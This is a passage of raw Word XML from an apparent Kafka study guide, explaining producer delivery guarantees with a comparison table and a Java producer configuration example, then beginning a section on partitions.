    <w:p w14:paraId="289CA08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1BC73017"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w latency</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: As no retry mechanism is used, this guarantees the fastest message sending.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438C9C0D"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If there’s a failure during message delivery, the message is lost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044B7352"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275536">
          <v:rect id="_x0000_i3380" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D93C70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 Delivery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0947919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Least Once</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> delivery, every message will be </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>delivered at least once</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, but some messages may be delivered </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>more than once</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if a retry occurs due to a failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A9283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0978C86F"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tries on failure</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: If the producer doesn’t receive an acknowledgment (e.g., due to a network failure), it will </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>retry</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sending the message until acknowledgment is received.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AE06DD"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 xml:space="preserve">: This guarantee ensures </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>no message is lost</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, but in case of retries, there may be </w:t>
      </w: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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244A4380"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commonly used in systems where </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message loss is unacceptable</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duplicates can be handled</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, such as in order processing or analytics systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500C38A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7FE7210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Acknowledgment is required from the leader broker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EA339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The producer will retry up to 3 times on failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CA67C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56FAEB31"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uplication</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Possible, because retries are triggered on failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731DAAB6"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nsures no message loss</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Messages are guaranteed to be delivered to the broker, but duplicates might need to be handled by the consumer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542B083E"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oderate latency</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Retry behavior can introduce a slight delay.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E823BE"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CE2B7">
          <v:rect id="_x0000_i3381" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AFF51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 Delivery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265AF8C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each message is </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>delivered exactly once</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with no duplication or message loss, even in the case of retries. This is the strongest guarantee but comes with some overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B06E0A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21E64CC1"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dempotence</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka ensur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to prevent message duplication. This means the producer sends a message, and Kafka guarantees that even if the producer retries, it will not create duplicates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1B3DEA"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Kafka also supports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to ensure that a group of messages is committed atomically. This ensures that the messages are either all written successfully or none at all.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F22FD84"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used in systems where </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>both message loss and duplicates are unacceptable</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, such as in banking transactions, payment systems, or critical inventory systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C64A40A"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3BF613D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                    # Acknowledgment is required from all in-sync replicas (ISR).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A63CA7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    # Infinite retries (or as per configuration).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115BFDC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     # Enables idempotence for the producer to prevent duplicates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112338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lt;id&gt;       # Enables transaction support for the producer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F41EA9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6ED2517D"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message loss or duplication</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka ensures that each message is processed exactly once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158D1B0E"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er latency</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Due to idempotent guarantees and transactional support, the processing time is higher compared to other delivery guarantees.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61539843"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stly</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The overhead of guaranteeing exactly-once semantics comes at the cost of higher system complexity and increased resource utilization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F053AAC"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92681D">
          <v:rect id="_x0000_i3382" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A8CDB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299"/>
        <w:gridCol w:w="1172"/>
        <w:gridCol w:w="955"/>
        <w:gridCol w:w="3475"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="0745EB17" w14:textId="77777777" w:rsidTr="0000666C">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74E9FC7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Guarantee</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F883B06"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 Loss</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="384D398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uplicates</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05A4126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Latency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0262117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Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="09C568E6" w14:textId="77777777" w:rsidTr="0000666C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20587C7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Most Once</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DAAD6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1DF4E1A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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5682B05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w</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EB3FB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 stats, or non-critical data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="10413FB2" w14:textId="77777777" w:rsidTr="0000666C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="755606F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Least Once</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0055E92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ADF4D1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639C90B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derate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0867C6C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processing, analytics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="6C4ABB22" w14:textId="77777777" w:rsidTr="0000666C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3235581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xactly Once</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4382698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D17A98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0FCF641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igh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="223F2A6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inancial transactions, critical systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="09FA0203"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0EE03">
          <v:rect id="_x0000_i3383" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="572BEDE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to Implement Each Guarantee?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B529554"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A378C43"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00CAA87"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F6BBC3"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148DDC98"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In this case, the producer will send a message without waiting for an acknowledgment, and it won't retry in case of failure. This will result in the </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fastest</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> message delivery but can cause </w:t>
      </w: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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21546F8E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F48698B"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5805C612"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or acks=all for stronger guarantees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708C92CD"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Retries up to 3 times on failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE8C2C0"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n this case, the producer retries on failure and guarantees that no messages are lost, but some messages may be </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>duplicated</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B84186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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A88998"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DB3812F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6FB04E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CB7E12"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB05B4C"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my-transactional-id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAB3586"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configuration enabl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which guarantees that each message is delivered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The producer retries on failure and ensures no message duplication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59311106"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BBE2">
          <v:rect id="_x0000_i3384" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A66E7A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Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D0B3C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how you would configure the producer for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guarantee:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298E8E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erties props = new Properties();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D04361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bootstrap.servers", "localhost:9092");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059C403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acks", "all");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56583D5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retries", Integer.MAX_VALUE);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1237329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enable.idempotence", "true");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9D875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key.serializer", "org.apache.kafka.common.serialization.StringSerializer");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385E6B2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value.serializer", "org.apache.kafka.common.serialization.StringSerializer");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194085E4"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transactional.id", "my-transactional-id");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5D3872" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C" w:rsidP="008E5BA7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="224B453B"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Producer&lt;String, String&gt; producer = new KafkaProducer&lt;&gt;(props);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CABBDC7" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C" w:rsidP="008E5BA7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="239C50D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beginTransaction();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED6F26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send(new ProducerRecord&lt;&gt;(topic, key, value));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571DEAC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commitTransaction();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C599B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lusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A6896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delivery guarantees allow producers to choose the level of reliability they need based on the requirements of the application. For applications that can tolerate some message loss (e.g., logging),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is sufficient. For critical applications,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guarantees both reliability and no duplicates, although it comes with higher overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDEE68A" w14:textId="3F03D956" w:rsidR="0000666C" w:rsidRPr="00CE4B95"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385" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="43885025" w14:textId="6704956B" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00025820" w:rsidP="007C61B8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="834" w:name="_Toc197868048"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are Kafka partitions, and why are they used</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="834"/>
    </w:p>
    <w:p w14:paraId="7DCD658F" w14:textId="37F8C4D3" w:rsidR="00DD2097" w:rsidRPr="008E5BA7" w:rsidRDefault="00DD2097"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Definition and Purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBE14A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re a fundamental concept in Kafka’s architecture, allowing it to scale and achieve high throughput. A partition is essentially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Features of Kafka Partitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB4C4AC"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istribution</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Kafka topics are divided into multiple partitions. Each partition can be hosted on different brokers, allowing for distributed storage and processing. This helps achieve high scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE9DCDD"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Redundanc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supports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of partitions to ensure fault tolerance. Each partition has one or more replicas, and one replica is the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while the others are </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>followers</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. The leader handles all read and write operations, while the followers replicate the leader's data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CAF71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w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single partition</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. However, the ordering is not guaranteed </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>across multiple partitions. This means that messages within a partition are strictly ordered, but Kafka does not provide ordering guarantees when messages are spread across different partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D75B09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Partitions allow Kafka to </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parallelize</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> processing, as each consumer in a consumer group can read from a different partition in parallel. This enables Kafka to scale efficiently and process large volumes of data.</w:t>
      </w:r>
    </w:p>
